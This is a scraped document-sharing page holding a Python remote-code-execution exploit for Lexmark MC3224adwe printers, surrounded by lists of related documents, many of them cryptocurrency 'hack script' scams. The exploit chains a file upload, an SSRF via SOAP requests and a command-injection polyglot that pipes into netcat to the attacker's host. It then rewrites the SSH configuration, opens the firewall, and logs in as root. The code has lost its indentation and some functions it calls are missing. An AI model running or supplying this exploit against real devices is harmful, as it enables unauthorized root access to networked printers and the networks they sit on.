0% found this document useful (0 votes)

85 views5 pages

Exploit

Uploaded by

fonek98783

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

85 views5 pages

Exploit

Uploaded by

fonek98783

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 5

#!

/usr/bin/env python

from threading import Thread

import time
import sys
import uuid
import requests
import socket
import os

from datetime import datetime

MAXTIME = (60*5)
LOCAL_PORT_ROOT = 1912

def banner():
print("")
print(" $$$ Lexmark MC3224adwe RCE Exploit $$$")
print(" -- by blasty <peter@haxx.in> -- ")
print("")

def usage():
print(" usage: %s <target ip> <local ip>" % sys.argv[0])
print("")
exit(0)

COMMANDS_LPE="""
cat << EOF > /dev/shm/q.sh
#!/bin/sh
sed -Ee 's/(RSAAuthentication|UsePrivilegeSeparation|UseLogin)/#\\ 1/g' \
-e 's/AllowUsers guest/AllowUsers root guest/' \
/etc/ssh/sshd_config_perf > /tmp/sshconf
mkdir /var/run/sshd
iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT
nohup /usr/sbin/sshd -f /tmp/sshconf &
EOF

sh /dev/shm/q.sh
"""

LOGO_SRC_FILE = "/var/fs/shared/faxdata/logo"
FWDEBUG_PIPE = "/run/svcerr/auto_fwdebug_pipe"

SOAP_A="""<?xml version="1.0" encoding="utf-8"?>

<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"
xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing"
xmlns:wse="http://schemas.xmlsoap.org/ws/2004/08/eventing"
xmlns:ew="http://www.example.com/warnings"
xmlns:prt="http://schemas.microsoft.com/windows/2006/08/wdp/print">
<soap:Header>
<wsa:Action>http://schemas.xmlsoap.org/ws/2004/08/eventing/Subscribe</wsa:Action>
<wsa:MessageID>
uuid:UUID_VALUE
</wsa:MessageID>
<wsa:ReplyTo>
<wsa:Address>http://127.0.0.1:12039/EP1</wsa:Address>
</wsa:ReplyTo>
<wsa:To>http://REMOTE_IP:65002</wsa:To>
</soap:Header>
<soap:Body>
<wse:Subscribe>
<wse:EndTo>
<wsa:Address>http://127.0.0.1:12039/EP2</wsa:Address>
<wsa:ReferenceProperties>
<ew:MySubscription>1234</ew:MySubscription>
</wsa:ReferenceProperties>
<wsa:ReferenceParameters>
<wse:Identifier>IDID-1</wse:Identifier>
</wsa:ReferenceParameters>
</wse:EndTo>
<wse:Delivery>
<wse:NotifyTo>
<wsa:Address>http://127.0.0.1:12039/EP3
/fax misc copyfile SOURCE DESTINATION_A
/fax misc copyfile SOURCE DESTINATION_B
/quit
/exit
</wsa:Address>
<wsa:ReferenceParameters>
<wse:Identifier>SCOOBYSNAX</wse:Identifier>
</wsa:ReferenceParameters>
</wse:NotifyTo>
</wse:Delivery>

<wse:Filter>http://schemas.microsoft.com/windows/2006/08/wdp/print/JobStatusEvent</wse:Filter>
</wse:Subscribe>
</soap:Body>
</soap:Envelope>
"""

SOAP_B="""<?xml version="1.0" encoding="utf-8"?>

<wsa:Action>http://schemas.microsoft.com/windows/2006/08/wdp/print/CreatePrintJob</wsa:Action>
<wsa:MessageID>
uuid:UUID_VALUE
</wsa:MessageID>
<wsa:ReplyTo>
<wsa:Address>http://1.2.3.4:1337</wsa:Address>
</wsa:ReplyTo>
<wsa:To>http://REMOTE_IP:65002</wsa:To>
</soap:Header>
<soap:Body>
<pri:CreatePrintJobRequest>
<pri:PrintTicket>
<pri:JobDescription>
<pri:JobName>JOBNAME</pri:JobName>
<pri:JobOriginatingUserName>user</pri:JobOriginatingUserName>
</pri:JobDescription>
</pri:PrintTicket>
</pri:CreatePrintJobRequest>
</soap:Body>
</soap:Envelope>
"""

def listener_task(port, tag, send_data = None):

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('0.0.0.0', port))
s.listen(2)
conn, address = s.accept()
report('!', tag, "YES! Connection from: %s " % str(address))
r = conn.recv(1024)
if send_data is not None:
conn.send(send_data)
conn.close()
return r

def root_shell_task():
r = listener_task(LOCAL_PORT_ROOT, "ROOT-SHELL", COMMANDS_LPE.encode('utf8'))
report('!', 'ROOT-SHELL', "id output: " + r.decode('utf8'))

def write_logo_file(data):
r = requests.post(
"http://%s /webglue/uploadfile/ImportFaxLogo" % g_target,
files={
'x': data
}
)

def copy_file(src, dst_a, dst_b):

report('~', "SSRF", "trigger part 1")

uuid_val = str(uuid.uuid4())

body_a = SOAP_A.replace("REMOTE_IP", g_target)

body_a = body_a.replace("SOURCE", src)
body_a = body_a.replace("DESTINATION_A", dst_a)
body_a = body_a.replace("DESTINATION_B", dst_b)
body_a = body_a.replace("UUID_VALUE", uuid_val)

body_b = SOAP_B.replace("REMOTE_IP", g_target)

body_b = body_b.replace("UUID_VALUE", uuid_val)

r = requests.post(
"http://%s :65002/" % g_target,
headers = headers,
data = body_a
)

if r.status_code != 200:
report('x', 'SSRF', 'trigger part 1 failed')
exit(-1)

report('~', "SSRF", "trigger part 2")

r = requests.post(
"http://%s :65002/" % g_target,
headers = headers,
data = body_b
)

if r.status_code != 200:
report('x', 'SSRF', 'trigger part 2 failed')
exit(-1)

time.sleep(5)

return True

if __name__ == "__main__":
banner()

if len(sys.argv) != 3:
usage()

g_target = sys.argv[1]
g_local_ip = sys.argv[2]

stop_clock = False

thread_clock = Thread(target=clock_task)
thread_root_shell = Thread(target=root_shell_task)

thread_clock.start()

report('i', "HACK", "attacking %s , sending shells to %s " % (g_target, g_local_ip))

thread_root_shell.start()

starttime = datetime.now()

headers = {
"Content-Type": "application/soap+xml"
}

polyglot = "lol;\" ;sh /tmp/xyz # \" ; id | nc LOCAL_IP LOCAL_PORT_ROOT | sh # "

polyglot = polyglot.replace("LOCAL_IP", g_local_ip)
polyglot = polyglot.replace("LOCAL_PORT_ROOT", str(LOCAL_PORT_ROOT))

report('~', "UPLOAD", "upload lpe polyglot")

write_logo_file(polyglot.encode('utf8'))

report('~', "COPY", "copy polyglot to /tmp and pipe")

copy_file(LOGO_SRC_FILE, "/tmp/xyz", FWDEBUG_PIPE)

report('~', "WAIT", "patience you must have, my young padawan")

thread_root_shell.join()

stop_clock = True

endtime = datetime.now()
delta = endtime - starttime

report('i', "HACK", "pwning took %d seconds!" % delta.seconds)

if delta.seconds > MAXTIME:

report('-', "HACK", "we ran out of wallclock time :(")
else:
report(
'!', "HACK",
"we have %d seconds left, phew!" % (MAXTIME - delta.seconds)
)

report('?', "HACK", "lets see if our ssh daemon is alive..")

ssh_try = 0

while True:
report('*', 'HACK', "(%d ) attempting to connect to ssh.." % ssh_try)
try:
s = socket.create_connection((g_target, 22))
r = s.recv(1024)
report('!', 'HACK', "YES! ssh banner: " + r.decode('utf8'))
break
except:
pass

ssh_try = ssh_try + 1
time.sleep(0.5)

login_cmd = "/bin/bash -l"

ssh_cmd = "ssh -t -i ssh_key/id_rsa_lexmark -o UserKnownHostsFile=/dev/null -o

'StrictHostKeyChecking no' root@%s '%s '" % (
g_target, login_cmd
)
report('!', "HACK", "spawning flair and interactive ssh shell..")
os.system(ssh_cmd)

print("* GOODBYE *")

exit(0)

Doku - Pub - Cryptotab Hacking Scripttxt 1
100% (1)
Doku - Pub - Cryptotab Hacking Scripttxt 1
48 pages
Crytab
No ratings yet
Crytab
2 pages
Reverse Shell
No ratings yet
Reverse Shell
27 pages
FreeBitcoin Script 2019
100% (1)
FreeBitcoin Script 2019
3 pages
Cryptotab New File by SH
33% (3)
Cryptotab New File by SH
229 pages
Blockchain Unspent or Unconfirmed Transaction Script (Nov 2019)
No ratings yet
Blockchain Unspent or Unconfirmed Transaction Script (Nov 2019)
1 page
Freebitco 3btc Script Hacklog Updated
50% (2)
Freebitco 3btc Script Hacklog Updated
4 pages
Script Hack 2019
50% (2)
Script Hack 2019
1 page
Blockchain Scam Alert
No ratings yet
Blockchain Scam Alert
2 pages
Toaz - Info Freebitco 3btc Script Hacklog Updated PR
No ratings yet
Toaz - Info Freebitco 3btc Script Hacklog Updated PR
2 pages
14btc Cryptotab Browser Hack Script 2020txt PDF Free
No ratings yet
14btc Cryptotab Browser Hack Script 2020txt PDF Free
1 page
Freebitcoin Next Roll Predicttxt 3 PDF
No ratings yet
Freebitcoin Next Roll Predicttxt 3 PDF
1 page
Bitcoin Wallet Verification Scam
No ratings yet
Bitcoin Wallet Verification Scam
2 pages
5 6287289035614324164
No ratings yet
5 6287289035614324164
9 pages
Blockchain Unconfirmed TX Script 2019 Free Download PDF
No ratings yet
Blockchain Unconfirmed TX Script 2019 Free Download PDF
3 pages
Doku - Pub Cryptotab Hacking Scripttxt
No ratings yet
Doku - Pub Cryptotab Hacking Scripttxt
29 pages
Coin Coin Vol7.1.20
No ratings yet
Coin Coin Vol7.1.20
2 pages
Hack Script
No ratings yet
Hack Script
1 page
Free Bitcoin Low Balance Script PDF
No ratings yet
Free Bitcoin Low Balance Script PDF
4 pages
Bitcoin Free Balance Doubler Updated 2021
No ratings yet
Bitcoin Free Balance Doubler Updated 2021
2 pages
Freebitco in Next Roll Predict
No ratings yet
Freebitco in Next Roll Predict
2 pages
Btcmining - Best Hack Skript
100% (1)
Btcmining - Best Hack Skript
4 pages
Cryptotab Hacking Script 2019
No ratings yet
Cryptotab Hacking Script 2019
3 pages
Recaptcha
No ratings yet
Recaptcha
5 pages
Unconfirmed Trans Divert Bypass 7 2023
No ratings yet
Unconfirmed Trans Divert Bypass 7 2023
4 pages
Not Defteri
No ratings yet
Not Defteri
1 page
BG 1
No ratings yet
BG 1
1 page
Freebitco In2020 June, Activate Bonus 1000%,script Free, Payment Proof
No ratings yet
Freebitco In2020 June, Activate Bonus 1000%,script Free, Payment Proof
2 pages
FreeBitcoin Script Roll 10000
No ratings yet
FreeBitcoin Script Roll 10000
4 pages
Current NixOS Packages
No ratings yet
Current NixOS Packages
520 pages
Free Bitcoin Script 2020 NEW For 12 BTC Per Hour
100% (1)
Free Bitcoin Script 2020 NEW For 12 BTC Per Hour
2 pages
ChatGPT's Role in Web3 Security
No ratings yet
ChatGPT's Role in Web3 Security
33 pages
Script Freebitcoin 3
No ratings yet
Script Freebitcoin 3
2 pages
Code
No ratings yet
Code
3 pages
Freebito Roll Scrypt - TXT
No ratings yet
Freebito Roll Scrypt - TXT
2 pages
Auto Roll
No ratings yet
Auto Roll
3 pages
Transaction Hack Scriptdocx PR C33da7ea9fdd9db11437074c64d61b 2 PDF Free
No ratings yet
Transaction Hack Scriptdocx PR C33da7ea9fdd9db11437074c64d61b 2 PDF Free
4 pages
Install Guide
67% (3)
Install Guide
64 pages
Bitsler Script
No ratings yet
Bitsler Script
4 pages
Scrip Cryptotab Hack 2018 Computer Related Introductions Text PDF
No ratings yet
Scrip Cryptotab Hack 2018 Computer Related Introductions Text PDF
1 page
TERMUX2019
No ratings yet
TERMUX2019
12 pages
Freebitco.in Auto Betting Script
No ratings yet
Freebitco.in Auto Betting Script
1 page
Sato Sato
No ratings yet
Sato Sato
2 pages
For Get Script Bypass Satoshidisk
No ratings yet
For Get Script Bypass Satoshidisk
1 page
Scrip de Freebitcoins
0% (1)
Scrip de Freebitcoins
2 pages
JavaScript Code Debugging
No ratings yet
JavaScript Code Debugging
1 page
Scrip Cryptotab
50% (2)
Scrip Cryptotab
3 pages
(NEW-SCRIPT) Infinite Rotation For BTC Spinner - 1700 RPM
No ratings yet
(NEW-SCRIPT) Infinite Rotation For BTC Spinner - 1700 RPM
1 page
SCRIPT LTC - TXT 2
No ratings yet
SCRIPT LTC - TXT 2
1 page
.TXT Scipt Hack
100% (1)
.TXT Scipt Hack
3 pages
Freebitco
No ratings yet
Freebitco
1 page
Cryptotab Hacking Scripttxt
50% (2)
Cryptotab Hacking Scripttxt
29 pages
Another Hack Test15
No ratings yet
Another Hack Test15
7 pages
Coloab RDP
No ratings yet
Coloab RDP
12 pages
Hack Academy's Reverse Shell Cheat Sheet ?
No ratings yet
Hack Academy's Reverse Shell Cheat Sheet ?
18 pages
Python TCP Client-Server Code
No ratings yet
Python TCP Client-Server Code
4 pages
Another Hack Test8
No ratings yet
Another Hack Test8
3 pages
Osep Resources
No ratings yet
Osep Resources
2 pages
Printerbug 877789
No ratings yet
Printerbug 877789
5 pages
Multi - Comand - SSH - Telnet .Py
No ratings yet
Multi - Comand - SSH - Telnet .Py
3 pages
Market Basket Analysis AProfit Based Approachto Apriori Algorithm
No ratings yet
Market Basket Analysis AProfit Based Approachto Apriori Algorithm
8 pages
Archivo 01
No ratings yet
Archivo 01
2 pages
Management Consulting Expertise
No ratings yet
Management Consulting Expertise
1 page
Terns of North America: A Photographic Guide
No ratings yet
Terns of North America: A Photographic Guide
13 pages
IV SW MID-1 Objective Set-I
No ratings yet
IV SW MID-1 Objective Set-I
1 page
MAPC5112A1
No ratings yet
MAPC5112A1
4 pages
CRg7-Passport-CP-tester (English V1)
No ratings yet
CRg7-Passport-CP-tester (English V1)
21 pages
Online STTP Schdule
No ratings yet
Online STTP Schdule
1 page
Bachelor of Science Education of University of Mindanao Tagum College
No ratings yet
Bachelor of Science Education of University of Mindanao Tagum College
6 pages
CS603 SOLUTION-2 by JUNAID
50% (2)
CS603 SOLUTION-2 by JUNAID
6 pages
Booth Multiplier On 23 06 10
No ratings yet
Booth Multiplier On 23 06 10
25 pages
Energy Metering IC With SPI Interface and Active Power Pulse Output
No ratings yet
Energy Metering IC With SPI Interface and Active Power Pulse Output
44 pages
ISEC-655 Information Security Governance Assignment 2 Guidelines
No ratings yet
ISEC-655 Information Security Governance Assignment 2 Guidelines
3 pages
Inventory Management System Software
No ratings yet
Inventory Management System Software
4 pages
B.Tech C Programming Lab Guide
No ratings yet
B.Tech C Programming Lab Guide
43 pages
Projecr - Report House Price Pred
No ratings yet
Projecr - Report House Price Pred
18 pages
Accounting Reconciliation Test
No ratings yet
Accounting Reconciliation Test
2 pages
UNIT 5 CGAR MCQs
No ratings yet
UNIT 5 CGAR MCQs
4 pages
LI L3 Mid Practice Test R&W
No ratings yet
LI L3 Mid Practice Test R&W
10 pages
A-Globe Agent Development Platform With Inaccessibility and Mobility Support
No ratings yet
A-Globe Agent Development Platform With Inaccessibility and Mobility Support
26 pages
Dynamic Simulation of The Temperature Field of Stainless Steel Laser Welding
No ratings yet
Dynamic Simulation of The Temperature Field of Stainless Steel Laser Welding
6 pages
JFP 180BB
No ratings yet
JFP 180BB
2 pages
Examen HUAWEI HCIA Routing Switching
No ratings yet
Examen HUAWEI HCIA Routing Switching
52 pages
DTC-325 DtGrabber+ Manual
No ratings yet
DTC-325 DtGrabber+ Manual
38 pages
Internship-Report 32429
No ratings yet
Internship-Report 32429
31 pages
Embedded System Weeks 10
No ratings yet
Embedded System Weeks 10
38 pages
Repeated CamScanner Document
No ratings yet
Repeated CamScanner Document
130 pages
Software Engineering Conversion
No ratings yet
Software Engineering Conversion
12 pages
19 - Decision Tree - ID3
No ratings yet
19 - Decision Tree - ID3
87 pages
7010 Computer Studies: MARK SCHEME For The October/November 2007 Question Paper
No ratings yet
7010 Computer Studies: MARK SCHEME For The October/November 2007 Question Paper
11 pages

Exploit

Uploaded by

Exploit

Uploaded by

#!

from threading import Thread

from datetime import datetime

SOAP_A="""<?xml version="1.0" encoding="utf-8"?>

SOAP_B="""<?xml version="1.0" encoding="utf-8"?>

def report(indicator, tag, text):

def listener_task(port, tag, send_data = None):

def copy_file(src, dst_a, dst_b):

body_a = SOAP_A.replace("REMOTE_IP", g_target)

body_b = SOAP_B.replace("REMOTE_IP", g_target)

report('~', "SSRF", "trigger part 2")

report('i', "HACK", "attacking %s , sending shells to %s " % (g_target, g_local_ip))

polyglot = "lol;\" ;sh /tmp/xyz # \" ; id | nc LOCAL_IP LOCAL_PORT_ROOT | sh # "

report('~', "UPLOAD", "upload lpe polyglot")

report('~', "COPY", "copy polyglot to /tmp and pipe")

report('~', "WAIT", "patience you must have, my young padawan")

report('i', "HACK", "pwning took %d seconds!" % delta.seconds)

if delta.seconds > MAXTIME:

report('?', "HACK", "lets see if our ssh daemon is alive..")

login_cmd = "/bin/bash -l"

ssh_cmd = "ssh -t -i ssh_key/id_rsa_lexmark -o UserKnownHostsFile=/dev/null -o

print("* GOODBYE *")

You might also like

Exploit

Uploaded by

Exploit

Uploaded by

#!

from threading import Thread

from datetime import datetime

SOAP_A="""<?xml version="1.0" encoding="utf-8"?>

SOAP_B="""<?xml version="1.0" encoding="utf-8"?>

def report(indicator, tag, text):

def listener_task(port, tag, send_data = None):

def copy_file(src, dst_a, dst_b):

body_a = SOAP_A.replace("REMOTE_IP", g_target)

body_b = SOAP_B.replace("REMOTE_IP", g_target)

report('~', "SSRF", "trigger part 2")

report('i', "HACK", "attacking %s , sending shells to %s " % (g_target, g_local_ip))

polyglot = "lol;\" ;sh /tmp/xyz # \" ; id | nc LOCAL_IP LOCAL_PORT_ROOT | sh # "

report('~', "UPLOAD", "upload lpe polyglot")

report('~', "COPY", "copy polyglot to /tmp and pipe")

report('~', "WAIT", "patience you must have, my young padawan")

report('i', "HACK", "pwning took %d seconds!" % delta.seconds)

if delta.seconds > MAXTIME:

report('?', "HACK", "lets see if our ssh daemon is alive..")

login_cmd = "/bin/bash -l"

ssh_cmd = "ssh -t -i ssh_key/id_rsa_lexmark -o UserKnownHostsFile=/dev/null -o

print("*** GOODBYE ***")

You might also like

print("* GOODBYE *")